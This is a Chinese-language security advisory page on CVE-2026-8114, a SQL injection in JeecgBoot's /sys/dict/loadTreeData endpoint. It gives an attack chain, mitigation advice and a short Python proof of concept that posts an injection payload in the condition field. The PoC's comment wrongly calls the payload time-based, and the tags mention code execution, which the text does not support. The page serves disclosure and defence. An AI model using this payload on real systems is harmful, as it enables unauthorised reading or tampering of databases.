IPBUF安全漏洞报告
English
CVE-2026-8114 CVSS 6.3 中危

CVE-2026-8114 JeecgBoot SQL注入漏洞

披露日期: 2026-05-07
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-8114
漏洞类型
SQL注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
JeecgBoot

相关标签

SQL注入JeecgBoot远程代码执行中危

漏洞概述

JeecgBoot 3.9.1及之前版本存在SQL注入漏洞。该漏洞位于JSON Object Handler组件的/sys/dict/loadTreeData文件接口中。由于未正确过滤condition参数,远程攻击者可利用此漏洞执行恶意SQL语句,导致数据泄露或篡改。厂商已确认该问题并进行了修复。

技术细节

该漏洞的根本原因在于JeecgBoot框架在处理字典树数据加载请求时,对传入的`condition`参数缺乏严格的输入验证。攻击者可以通过发送特制的HTTP POST请求到`/sys/dict/loadTreeData`端点,将SQL注入载荷注入到`condition`字段中。后端代码在处理该参数时,直接将其拼接到SQL查询语句中执行,从而允许攻击者绕过安全检查。利用此漏洞需要低权限,且无需用户交互,攻击者可通过网络远程利用,导致数据库的机密性、完整性和可用性受到低到中等程度的影响。

攻击链分析

STEP 1
侦察
识别目标系统是否运行JeecgBoot且版本低于或等于3.9.1。
STEP 2
漏洞利用
向/sys/dict/loadTreeData接口发送包含恶意SQL语句的condition参数的POST请求。
STEP 3
数据窃取/破坏
服务器执行注入的SQL语句,攻击者获取数据库敏感信息或修改数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (replace with actual target) target_url = "http://example.com/jeecg-boot/sys/dict/loadTreeData" # Malicious payload for 'condition' argument # This payload attempts to perform a time-based blind SQL injection payload = { "condition": "1' AND (SELECT SUBSTRING(version(),1,1))='5'-- " } try: # Send POST request response = requests.post(target_url, json=payload, timeout=10) # Check if the request was successful if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response content:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

JeecgBoot <= 3.9.1

防御指南

临时缓解措施
建议立即升级JeecgBoot以修复此漏洞。若无法立即升级,应在Web应用防火墙(WAF)中配置规则,拦截针对/sys/dict/loadTreeData接口且包含SQL注入特征的请求流量。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。